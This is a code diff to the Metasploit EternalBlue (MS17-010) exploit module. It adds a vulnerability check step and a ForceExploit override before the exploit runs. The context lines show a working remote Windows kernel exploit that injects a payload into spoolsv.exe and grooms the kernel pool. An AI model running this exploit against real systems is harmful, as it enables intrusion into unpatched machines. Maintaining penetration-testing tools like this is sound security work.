@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::CheckScanner
 
   def initialize(info = {})
     super(update_info(info,
@@ -60,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'WfsDelay' => 5
+          'WfsDelay' => 5,
+          'CheckScanner' => 'auxiliary/scanner/smb/smb_ms17_010'
         },
       'Privileged'     => true,
       'Payload'        =>
@@ -104,6 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_advanced_options(
       [
+        OptBool.new('ForceExploit', [false, 'Override check result', false]),
         OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
         OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
         OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
@@ -116,9 +119,13 @@ class MetasploitModule < Msf::Exploit::Remote
   class EternalBlueError < StandardError
   end
 
-  # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
+  # check is pulled in from Msf::Exploit::Remote::CheckScanner
 
   def exploit
+    unless check == CheckCode::Vulnerable || datastore['ForceExploit']
+      fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+    end
+
     begin
       for i in 1..datastore['MaxExploitAttempts']
         grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
